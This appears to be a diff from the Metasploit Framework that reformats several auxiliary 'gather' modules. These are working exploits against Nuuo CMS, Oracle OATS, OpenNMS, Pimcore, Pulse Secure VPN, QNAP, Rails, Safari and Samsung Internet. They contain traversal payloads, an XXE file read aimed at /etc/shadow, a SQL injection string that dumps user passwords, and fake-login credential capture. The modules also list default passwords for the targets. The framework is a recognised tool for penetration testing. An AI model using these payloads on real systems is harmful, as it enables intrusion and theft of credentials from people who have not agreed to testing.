for i in (0..weighted_array.length-1)
for i in (0..weighted_array.length - 1)
counter[i] = 0
end
total = 1
@@ -101,8 +102,8 @@ class MetasploitModule < Msf::Auxiliary
# Then we increment the value of the counter so we go on to the next combination.
for index in (counter.length - 1).downto(0) # From (counter array's length - 1) to 0
if counter[index] + 1 < length[index] then # If counter index can be incremented
counter[index] += 1; # Increment the counter index
break; # Stop the incrementation/go to the next combination printing/incrementing.
counter[index] += 1; # Increment the counter index
break; # Stop the incrementation/go to the next combination printing/incrementing.
end
counter[index] = 0; # Assign current counter index to zero and try incrementing the next counter index.
end
modules/auxiliary/gather/nuuo_cms_file_download.rb
+35 -31
View File
@@ -9,55 +9,59 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Nuuo Central Management Server Authenticated Arbitrary File Download',
'Description' => %q{
The Nuuo Central Management Server allows an authenticated user to download files from the
installation folder. This functionality can be abused to obtain administrative credentials,
the SQL Server database password and arbitrary files off the system with directory traversal.
The module will attempt to download CMServer.cfg (the user configuration file with all the user
passwords including the admin one), ServerConfig.cfg (the server configuration file with the
SQL Server password) and a third file if the FILE argument is provided by the user.
The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules
included in Metasploit, these files cannot be decrypted programmatically. The user will
have to open them with zip or a similar program and provide the default password "NUCMS2007!".
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
All versions of CMS server up to and including 3.5 are vulnerable to this attack.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
super(
update_info(
info,
'Name' => 'Nuuo Central Management Server Authenticated Arbitrary File Download',
'Description' => %q{
The Nuuo Central Management Server allows an authenticated user to download files from the
installation folder. This functionality can be abused to obtain administrative credentials,
the SQL Server database password and arbitrary files off the system with directory traversal.
The module will attempt to download CMServer.cfg (the user configuration file with all the user
passwords including the admin one), ServerConfig.cfg (the server configuration file with the
SQL Server password) and a third file if the FILE argument is provided by the user.
The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules
included in Metasploit, these files cannot be decrypted programmatically. The user will
have to open them with zip or a similar program and provide the default password "NUCMS2007!".
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
All versions of CMS server up to and including 3.5 are vulnerable to this attack.
},
'Author' => [
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-17934' ],
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-18-284-02' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]
],
'Platform' => ['win'],
'Privileged' => true,
'DisclosureDate' => '2018-10-11'))
'Platform' => ['win'],
'Privileged' => true,
'DisclosureDate' => '2018-10-11'
)
)
register_options(
[
OptInt.new('DEPTH', [true, 'Directory traversal depth [..\]', 2]),
OptString.new('FILE', [false, 'Additional file to download'])
])
]
)
end
def download_file(file_name, ctype='application/zip', depth=2)
def download_file(file_name, ctype = 'application/zip', depth = 2)
res = ncs_send_request({
'method' => 'GETCONFIG',
'user_session' => user_session,
'file_name' => %{#{"..\\"*depth}#{file_name}}
'method' => 'GETCONFIG',
'user_session' => user_session,
'file_name' => %{#{"..\\" * depth}#{file_name}}
})
return nil unless res
path = store_loot(file_name, ctype, datastore['RHOST'],
res.body, file_name, "Nuuo CMS #{file_name} downloaded")
print_good("Downloaded file to #{path}")
modules/auxiliary/gather/oats_downloadservlet_traversal.rb
+30 -29
View File
@@ -9,38 +9,38 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal',
'Description' => %q{
This module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load
Testing interface, a remote user can abuse the custom report template selector, and cause the
DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application
contains multiple configuration files that include encrypted credentials, and that there are
public resources for decryption, it is actually possible to gain remote code execution
by leveraging this directory traversal attack.
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal',
'Description' => %q{
This module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load
Testing interface, a remote user can abuse the custom report template selector, and cause the
DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application
contains multiple configuration files that include encrypted credentials, and that there are
public resources for decryption, it is actually possible to gain remote code execution
by leveraging this directory traversal attack.
Please note that authentication is required. By default, OATS has two built-in accounts:
default and administrator. You could try to target those first.
},
'License' => MSF_LICENSE,
'Author' =>
[
Please note that authentication is required. By default, OATS has two built-in accounts:
default and administrator. You could try to target those first.
},
'License' => MSF_LICENSE,
'Author' => [
'Steven Seeley', # Original discovery
'sinn3r' # Metasploit module
'sinn3r' # Metasploit module
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'RPORT' => 8088
},
'References' =>
[
'References' => [
['CVE', '2019-2557'],
['URL', 'https://srcincite.io/advisories/src-2019-0033/'],
['URL', 'https://www.oracle.com/security-alerts/cpuapr2019.html']
],
'DisclosureDate' => '2019-04-16'
))
'DisclosureDate' => '2019-04-16'
)
)
register_options(
[
@@ -48,7 +48,8 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('DEPTH', [true, 'The max traversal depth', 1]),
OptString.new('OATSUSERNAME', [true, 'The username to use for Oracle', 'default']),
OptString.new('OATSPASSWORD', [true, 'The password to use for Oracle']),
])
]
)
end
class OracleAuthSpec
@@ -75,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'olt/')
'uri' => normalize_uri(target_uri.path, 'olt/')
})
if res && res.body.include?('AdfLoopbackUtils.runLoopback')
@@ -116,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
})
fail_with(Failure::Unknown, 'No response from server') unless res
@@ -131,7 +132,7 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
'cookie' => "JSESSIONID=#{auth_spec.session_id}",
'vars_get' =>
{
@@ -156,7 +157,7 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'uri' => uri,
'cookie' => "JSESSIONID=#{auth_spec.session_id}",
'headers' =>
{
@@ -189,7 +190,7 @@ class MetasploitModule < Msf::Auxiliary
dots = '..\\' * datastore['DEPTH']
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
'cookie' => "JSESSIONID=#{auth_spec.session_id}",
'vars_get' =>
{
modules/auxiliary/gather/opennms_xxe.rb
+27 -27
View File
@@ -9,32 +9,35 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenNMS Authenticated XXE',
'Description' => %q{
OpenNMS is vulnerable to XML External Entity Injection in the Real-Time Console interface.
Although this attack requires authentication, there are several factors that increase the
severity of this vulnerability.
super(
update_info(
info,
'Name' => 'OpenNMS Authenticated XXE',
'Description' => %q{
OpenNMS is vulnerable to XML External Entity Injection in the Real-Time Console interface.
Although this attack requires authentication, there are several factors that increase the
severity of this vulnerability.
1. OpenNMS runs with root privileges, taken from the OpenNMS FAQ: "The difficulty with the
core of OpenNMS is that these components need to run as root to be able to bind to low-numbered
ports or generate network traffic that requires root"
1. OpenNMS runs with root privileges, taken from the OpenNMS FAQ: "The difficulty with the
core of OpenNMS is that these components need to run as root to be able to bind to low-numbered
ports or generate network traffic that requires root"
2. The user that you must authenticate as is the "rtc" user which has the default password of
"rtc". There is no mention of this user in the installation guides found here:
http://www.opennms.org/wiki/Tutorial_Installation, only mention that you should change the default
admin password of "admin" for security purposes.
},
'License' => MSF_LICENSE,
'Author' => [
2. The user that you must authenticate as is the "rtc" user which has the default password of
"rtc". There is no mention of this user in the installation guides found here:
http://www.opennms.org/wiki/Tutorial_Installation, only mention that you should change the default
admin password of "admin" for security purposes.
},
'License' => MSF_LICENSE,
'Author' => [
'Stephen Breen <breenmachine[at]gmail.com>', # discovery
'Justin Kennedy <jstnkndy[at]gmail.com>', # metasploit module
],
'References' => [
'References' => [
['CVE', '2015-0975']
],
'DisclosureDate' => '2015-01-08'
))
'DisclosureDate' => '2015-01-08'
)
)
register_options(
[
@@ -44,12 +47,11 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('FILEPATH', [true, "The file or directory to read on the server", "/etc/shadow"]),
OptString.new('USERNAME', [true, "The username to authenticate with", "rtc"]),
OptString.new('PASSWORD', [true, "The password to authenticate with", "rtc"])
])
]
)
end
def run
print_status("Logging in to grab a valid session cookie")
res = send_request_cgi({
@@ -58,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
'vars_post' => {
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD'],
'Login'=> 'Login'
'Login' => 'Login'
},
})
@@ -89,8 +91,8 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_raw({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rtc', 'post/'),
'data' => xxe,
'uri' => normalize_uri(target_uri.path, 'rtc', 'post/'),
'data' => xxe,
'cookie' => cookie
})
@@ -101,7 +103,5 @@ class MetasploitModule < Msf::Auxiliary
else
fail_with(Failure::Unknown, 'Error fetching file, try another')
end
end
end
modules/auxiliary/gather/pimcore_creds_sqli.rb
+38 -34
View File
@@ -7,48 +7,52 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Pimcore Gather Credentials via SQL Injection',
'Description' => %q{
This module extracts the usernames and hashed passwords of all users of
the Pimcore web service by exploiting a SQL injection vulnerability in
Pimcore's REST API.
super(
update_info(
info,
'Name' => 'Pimcore Gather Credentials via SQL Injection',
'Description' => %q{
This module extracts the usernames and hashed passwords of all users of
the Pimcore web service by exploiting a SQL injection vulnerability in
Pimcore's REST API.
Pimcore begins to create password hashes by concatenating a user's
username, the name of the application, and the user's password in the
format USERNAME:pimcore:PASSWORD.
Pimcore begins to create password hashes by concatenating a user's
username, the name of the application, and the user's password in the
format USERNAME:pimcore:PASSWORD.
The resulting string is then used to generate an MD5 hash, and then that
MD5 hash is used to create the final hash, which is generated using
PHP's built-in password_hash function.
},
'Author' => [ 'Thongchai Silpavarangkura', # PoC
'N. Rai-Ngoen', # PoC
'Shelby Pace' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-14058' ],
[ 'EDB', '45208' ]
],
'Notes' =>
{
The resulting string is then used to generate an MD5 hash, and then that
MD5 hash is used to create the final hash, which is generated using
PHP's built-in password_hash function.
},
'Author' => [
'Thongchai Silpavarangkura', # PoC
'N. Rai-Ngoen', # PoC
'Shelby Pace' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-14058' ],
[ 'EDB', '45208' ]
],
'Notes' => {
'SideEffects' => [ IOC_IN_LOGS ]
},
'DisclosureDate' => '2018-08-13'
))
'DisclosureDate' => '2018-08-13'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'The base path to pimcore', '/' ]),
OptString.new('APIKEY', [ true, 'The valid API key for Pimcore REST API', '' ])
])
]
)
end
def available?
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
res && res.code == 200 && res.body.include?('pimcore')
@@ -59,11 +63,11 @@ class MetasploitModule < Msf::Auxiliary
cmd = "#{rand(256)}) UNION ALL SELECT CONCAT(name,\" \",password) from users#"
res = send_request_cgi(
'method' => 'GET',
'uri' => api_uri,
'vars_get' => {
'apikey' => datastore['APIKEY'],
'id' => cmd
'method' => 'GET',
'uri' => api_uri,
'vars_get' => {
'apikey' => datastore['APIKEY'],
'id' => cmd
}
)
modules/auxiliary/gather/pulse_secure_file_disclosure.rb
+52 -49
View File
@@ -8,56 +8,59 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',
'Description' => %q{
This module exploits a pre-auth directory traversal in the Pulse Secure
VPN server to dump an arbitrary file. Dumped files are stored in loot.
super(
update_info(
info,
'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',
'Description' => %q{
This module exploits a pre-auth directory traversal in the Pulse Secure
VPN server to dump an arbitrary file. Dumped files are stored in loot.
If the "Automatic" action is set, plaintext and hashed credentials, as
well as session IDs, will be dumped. Valid sessions can be hijacked by
setting the "DSIG" browser cookie to a valid session ID.
If the "Automatic" action is set, plaintext and hashed credentials, as
well as session IDs, will be dumped. Valid sessions can be hijacked by
setting the "DSIG" browser cookie to a valid session ID.
For the "Manual" action, please specify a file to dump via the "FILE"
option. /etc/passwd will be dumped by default. If the "PRINT" option is
set, file contents will be printed to the screen, with any unprintable
characters replaced by a period.
For the "Manual" action, please specify a file to dump via the "FILE"
option. /etc/passwd will be dumped by default. If the "PRINT" option is
set, file contents will be printed to the screen, with any unprintable
characters replaced by a period.
Please see related module exploit/linux/http/pulse_secure_cmd_exec for
a post-auth exploit that can leverage the results from this module.
},
'Author' => [
'Orange Tsai', # Discovery (@orange_8361)
'Meh Chang', # Discovery (@mehqq_)
'Alyssa Herrera', # PoC (@Alyssa_Herrera_)
'Justin Wagner', # Module (@0xDezzy)
'wvu' # Module
],
'References' => [
['CVE', '2019-11510'],
['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],
['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],
['URL', 'https://hackerone.com/reports/591295']
],
'DisclosureDate' => '2019-04-24', # Public disclosure
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Dump creds and sessions'],
['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'HttpClientTimeout' => 5 # This seems sane
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [],
'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']
}
))
Please see related module exploit/linux/http/pulse_secure_cmd_exec for
a post-auth exploit that can leverage the results from this module.
},
'Author' => [
'Orange Tsai', # Discovery (@orange_8361)
'Meh Chang', # Discovery (@mehqq_)
'Alyssa Herrera', # PoC (@Alyssa_Herrera_)
'Justin Wagner', # Module (@0xDezzy)
'wvu' # Module
],
'References' => [
['CVE', '2019-11510'],
['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],
['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],
['URL', 'https://hackerone.com/reports/591295']
],
'DisclosureDate' => '2019-04-24', # Public disclosure
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Dump creds and sessions'],
['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'HttpClientTimeout' => 5 # This seems sane
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [],
'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']
}
)
)
register_options([
OptString.new(
@@ -106,8 +109,8 @@ class MetasploitModule < Msf::Auxiliary
print_status("Dumping #{path}")
res = send_request_cgi(
'method' => 'GET',
'uri' => dir_traversal(path),
'method' => 'GET',
'uri' => dir_traversal(path),
'partial' => true # Allow partial response due to timeout
)
modules/auxiliary/gather/qnap_backtrace_admin_hash.rb
+50 -47
View File
@@ -7,51 +7,54 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP NAS/NVR Administrator Hash Disclosure',
'Description' => %q{
This module exploits combined heap and stack buffer overflows for QNAP
NAS and NVR devices to dump the admin (root) shadow hash from memory via
an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.
super(
update_info(
info,
'Name' => 'QNAP NAS/NVR Administrator Hash Disclosure',
'Description' => %q{
This module exploits combined heap and stack buffer overflows for QNAP
NAS and NVR devices to dump the admin (root) shadow hash from memory via
an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.
A binary search is performed to find the correct offset for the BOFs.
Since the server forks, blind remote exploitation is possible, provided
the heap does not have ASLR.
},
'Author' => [
'bashis', # Vuln/PoC
'wvu', # Module
'Donald Knuth' # Algorithm
],
'References' => [
['URL', 'https://seclists.org/fulldisclosure/2017/Feb/2'],
['URL', 'https://en.wikipedia.org/wiki/Binary_search_algorithm']
],
'DisclosureDate' => '2017-01-31',
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Automatic targeting'],
['x86', 'Description' => 'x86 target', offset: 0x16b2],
['ARM', 'Description' => 'ARM target', offset: 0x1562]
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'SSL' => true
}
))
A binary search is performed to find the correct offset for the BOFs.
Since the server forks, blind remote exploitation is possible, provided
the heap does not have ASLR.
},
'Author' => [
'bashis', # Vuln/PoC
'wvu', # Module
'Donald Knuth' # Algorithm
],
'References' => [
['URL', 'https://seclists.org/fulldisclosure/2017/Feb/2'],
['URL', 'https://en.wikipedia.org/wiki/Binary_search_algorithm']
],
'DisclosureDate' => '2017-01-31',
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Automatic targeting'],
['x86', 'Description' => 'x86 target', offset: 0x16b2],
['ARM', 'Description' => 'ARM target', offset: 0x1562]
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'SSL' => true
}
)
)
register_options([
Opt::RPORT(443),
OptInt.new('OFFSET_START', [true, 'Starting offset (backtrace)', 2000]),
OptInt.new('OFFSET_END', [true, 'Ending offset (no backtrace)', 5000]),
OptInt.new('RETRIES', [true, 'Retry count for the attack', 10])
OptInt.new('OFFSET_END', [true, 'Ending offset (no backtrace)', 5000]),
OptInt.new('RETRIES', [true, 'Retry count for the attack', 10])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/authLogin.cgi'
'uri' => '/cgi-bin/authLogin.cgi'
)
if res && res.code == 200 && (xml = res.get_xml_document)
@@ -90,12 +93,12 @@ class MetasploitModule < Msf::Auxiliary
if admin_hash
print_good("Hopefully this is your hash: #{admin_hash}")
credential_data = {
workspace_id: myworkspace_id,
workspace_id: myworkspace_id,
module_fullname: self.fullname,
username: 'admin',
private_data: admin_hash,
private_type: :nonreplayable_hash,
jtr_format: 'md5crypt'
username: 'admin',
private_data: admin_hash,
private_type: :nonreplayable_hash,
jtr_format: 'md5crypt'
}.merge(service_details)
create_credential(credential_data)
else
@@ -110,8 +113,8 @@ class MetasploitModule < Msf::Auxiliary
r = datastore['OFFSET_END']
start = Time.now
t = binsearch(l, r)
stop = Time.now
t = binsearch(l, r)
stop = Time.now
time = stop - start
vprint_status("Binary search of #{l}-#{r} completed in #{time}s")
@@ -146,7 +149,7 @@ class MetasploitModule < Msf::Auxiliary
if token && token.start_with?('$1$')
admin_hash = token
addr = "0x#{offset.to_s(16)}"
addr = "0x#{offset.to_s(16)}"
vprint_status("Admin hash found at #{addr} with offset #{t}")
break
end
@@ -185,12 +188,12 @@ class MetasploitModule < Msf::Auxiliary
)
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/cgi.cgi',
#'vhost' => 'Q',
'method' => 'GET',
'uri' => '/cgi-bin/cgi.cgi',
# 'vhost' => 'Q',
'vars_get' => {
'u' => 'admin',
'p' => payload
'u' => 'admin',
'p' => payload
}
)
modules/auxiliary/gather/rails_doubletap_file_read.rb
+8 -9
View File
@@ -10,18 +10,17 @@ class MetasploitModule < Msf::Auxiliary
super(
update_info(
info,
'Name' => "Ruby On Rails File Content Disclosure ('doubletap')",
'Name' => "Ruby On Rails File Content Disclosure ('doubletap')",
'Description' => %q{
This module uses a path traversal vulnerability in Ruby on Rails
versions =< 5.2.2 to read files on a target server.
},
'Author' =>
[
'Author' => [
'Carter Brainerd <0xCB@protonmail.com>', # Metasploit module
'John Hawthorn <john@hawthorn.email>' # PoC/discovery
],
'License' => MSF_LICENSE,
'References' => [
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://hackerone.com/reports/473888' ],
[ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q' ],
@@ -53,11 +52,12 @@ class MetasploitModule < Msf::Auxiliary
end
def get_accept_header_value(depth, file)
return (('../'*depth) + file + '{{').gsub('//', '/')
return (('../' * depth) + file + '{{').gsub('//', '/')
end
def check
return true if datastore['SkipCheck']
# Check if target file is absolute path
unless datastore['TARGET_FILE'].start_with? '/'
vprint_error "TARGET_FILE must be an absolute path (eg. /etc/passwd)."
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['ROUTE']),
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], '/etc/passwd')}
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], '/etc/passwd') }
})
if res.nil?
@@ -92,13 +92,12 @@ class MetasploitModule < Msf::Auxiliary
fail_with(Failure::BadConfig, 'TARGET_FILE must be an absolute path (eg. /etc/passwd).') unless datastore['TARGET_FILE'].start_with? '/'
print_status "Requesting file #{datastore['TARGET_FILE']}"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['ROUTE']),
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], datastore['TARGET_FILE'])}
'headers' => { 'Accept' => get_accept_header_value(datastore['DEPTH'], datastore['TARGET_FILE']) }
})
if res.nil?
modules/auxiliary/gather/safari_file_url_navigation.rb
+37 -36
View File
@@ -3,47 +3,48 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Format::Webarchive
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',
'Description' => %q{
Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a
"state management issue" that allows a browser window to be navigated
to a file:// URL. By dropping and loading a malicious .webarchive file,
an attacker can read arbitrary files, inject cross-domain Javascript, and
silently install Safari extensions.
},
'License' => MSF_LICENSE,
'Author' => [
'joev' # discovery, module
],
'References' => [
['ZDI', '15-228'],
['CVE', '2015-1155'],
['URL', 'https://support.apple.com/en-us/HT204826']
],
'Platform' => 'osx',
'DisclosureDate' => '2014-01-16'
))
super(
update_info(
info,
'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',
'Description' => %q{
Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a
"state management issue" that allows a browser window to be navigated
to a file:// URL. By dropping and loading a malicious .webarchive file,
an attacker can read arbitrary files, inject cross-domain Javascript, and
silently install Safari extensions.
},
'License' => MSF_LICENSE,
'Author' => [
'joev' # discovery, module
],
'References' => [
['ZDI', '15-228'],
['CVE', '2015-1155'],
['URL', 'https://support.apple.com/en-us/HT204826']
],
'Platform' => 'osx',
'DisclosureDate' => '2014-01-16'
)
)
register_options([
OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
OptPort.new('SRVPORT', [true, "The local port to use for the FTP server", 8081]),
OptPort.new('HTTPPORT', [true, "The HTTP server port", 8080])
OptPort.new('SRVPORT', [true, "The local port to use for the FTP server", 8081]),
OptPort.new('HTTPPORT', [true, "The HTTP server port", 8080])
])
end
def lookup_lhost(c=nil)
def lookup_lhost(c = nil)
# Get the source address
if datastore['SRVHOST'] == '0.0.0.0'
Rex::Socket.source_address( c || '50.50.50.50')
Rex::Socket.source_address(c || '50.50.50.50')
else
datastore['SRVHOST']
end
@@ -145,7 +146,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Sending directory list via data connection #{webarchive_size}")
month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
m = month_names[Time.now.month-1]
m = month_names[Time.now.month - 1]
d = Time.now.day
y = Time.now.year
@@ -212,7 +213,7 @@ class MetasploitModule < Msf::Auxiliary
# Handle the HTTP request and return a response. Code borrorwed from:
# msf/core/exploit/http/server.rb
#
def start_http(opts={})
def start_http(opts = {})
# Ensture all dependencies are present before initializing HTTP
use_zlib
@@ -227,7 +228,7 @@ class MetasploitModule < Msf::Auxiliary
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['HTTPPORT'],
'Comm' => comm
'Comm' => comm
}.update(opts)
# Start a new HTTP server
@@ -237,7 +238,7 @@ class MetasploitModule < Msf::Auxiliary
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'Msf' => framework,
'MsfExploit' => self,
},
opts['Comm'],
@@ -250,8 +251,8 @@ class MetasploitModule < Msf::Auxiliary
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
@@ -287,7 +288,7 @@ class MetasploitModule < Msf::Auxiliary
# Returns the configured (or random, if not configured) URI path
#
def resource_uri
path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8 + rand(8))
path = '/' + path if path !~ /^\//
datastore['URIPATH'] = path
return path
@@ -296,7 +297,7 @@ class MetasploitModule < Msf::Auxiliary
#
# Create an HTTP response and then send it
#
def send_response(cli, code, message='OK', html='')
def send_response(cli, code, message = 'OK', html = '')
proto = Rex::Proto::Http::DefaultProtocol
res = Rex::Proto::Http::Response.new(code, message, proto)
res['Content-Type'] = 'text/html'
@@ -309,7 +310,7 @@ class MetasploitModule < Msf::Auxiliary
# @return [String] filename where we are storing the data
def record_data(data, cli)
name = if data.is_a?(Hash) then data.keys.first else 'data' end
file = File.basename(name).gsub(/[^A-Za-z]/,'')
file = File.basename(name).gsub(/[^A-Za-z]/, '')
store_loot(
file, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
)
modules/auxiliary/gather/samsung_browser_sop_bypass.rb
+21 -21
View File
@@ -10,31 +10,31 @@ class MetasploitModule < Msf::Auxiliary
super(
update_info(
info,
'Name' => 'Samsung Internet Browser SOP Bypass',
'Description' => %q(
'Name' => 'Samsung Internet Browser SOP Bypass',
'Description' => %q{
This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
credentials via a fake pop-up.
),
'License' => MSF_LICENSE,
'Author' => [
},
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra', # Original discovery, disclosure
'Tod Beardsley', # Metasploit module
'Jeffrey Martin' # Metasploit module
],
'References' => [
[ 'CVE', '2017-17692' ],
['URL', 'http://fr.0day.today/exploit/description/28434']
'References' => [
[ 'CVE', '2017-17692' ],
['URL', 'http://fr.0day.today/exploit/description/28434']
],
'DisclosureDate' => '2017-11-08',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
'DefaultAction' => 'WebServer'
)
)
register_options([
register_options([
OptString.new('TARGET_URL', [
true,
'The URL to spoof origin from.',
@@ -47,14 +47,13 @@ class MetasploitModule < Msf::Auxiliary
])
])
register_advanced_options([
OptString.new('CUSTOM_JS', [
false,
"Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
''
register_advanced_options([
OptString.new('CUSTOM_JS', [
false,
"Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.",
''
])
])
])
end
def run
@@ -63,6 +62,7 @@ class MetasploitModule < Msf::Auxiliary
def evil_javascript
return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank?
js = <<-EOS
setTimeout(function(){
x.document.body.innerHTML='<h1>404 Error</h1>'+
@@ -95,10 +95,10 @@ class MetasploitModule < Msf::Auxiliary
<body onclick="go()">
#{datastore['CUSTOM_HTML']}
</body></html>
EOS
EOS
end
def store_cred(username,password)
def store_cred(username, password)
credential_data = {
origin_type: :import,
module_fullname: self.fullname,
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
else
